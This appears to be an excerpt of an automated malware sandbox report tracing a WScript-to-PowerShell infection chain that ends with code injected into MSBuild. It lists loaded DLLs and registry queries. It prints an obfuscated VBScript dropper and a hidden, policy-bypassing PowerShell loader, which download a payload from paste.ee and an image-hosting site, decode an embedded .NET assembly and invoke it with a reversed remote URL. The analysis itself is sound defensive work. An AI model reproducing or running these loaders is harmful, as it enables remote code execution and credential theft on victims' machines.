                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") chammeante = ("$(@(?(@?@?dig@?@? = '") & excusar & "'" chammeante = chammeante & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" chammeante = chammeante & "[??}@*y??}@*" chammeante = chammeante & "t?*(?" chammeante = chammeante & "m.(@(?(@?@?" chammeante = chammeante & "nv?*(?r" chammeante = chammeante & "t]:" chammeante = chammeante & ":Fr@?@?" chammeante = chammeante & "mba??}@*" chammeante = chammeante & "?*(?64??}@*tring( $(@(?(" chammeante = chammeante & "@?@?d" chammeante = chammeante & "ig@?@?.r?*(?" chammeante = chammeante & "@%*:&la" chammeante = chammeante & "(@(?(?*(?('" chammeante = chammeante & "DgTr?*(?" chammeante = chammeante & "','" chammeante = chammeante & "A" chammeante = chammeante & "') ))" chammeante = chammeante & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" chammeante = Replace(chammeante,"@%*:&","p") chammeante = Replace(chammeante,"(@(?(","c") chammeante = Replace(chammeante,"?*(?","e") chammeante = Replace(chammeante,"@?@?","o") chammeante = Replace(chammeante,"??}@*","s") litoglifia1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " litoglifia1 = Replace(litoglifia1,"(@(?(","c") litoglifia1 = Replace(litoglifia1,"??}@*","s") litoglifia1 = Replace(litoglifia1,"@?@?","o") litoglifia1 = Replace(litoglifia1,"@%*:&","p") litoglifia = litoglifia1 & """" & chammeante & """" Cama.Run litoglifia, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/IKfbD", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D000BD pushad ; iretd 2_2_00007FF848D000C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066DF680 push 94066CC9h; ret 7_2_066DF68D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D373B pushfd ; iretd 7_2_066D3741
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D3AD7 push ebx; retf 7_2_066D3ADA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D6AA1 push edi; iretd 7_2_066D6AA2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D6379 push ecx; iretd 7_2_066D637A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D13F1 push es; iretd 7_2_066D13F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D2021 push cs; iretd 7_2_066D202A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D2810 push ss; iretd 7_2_066D281A
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
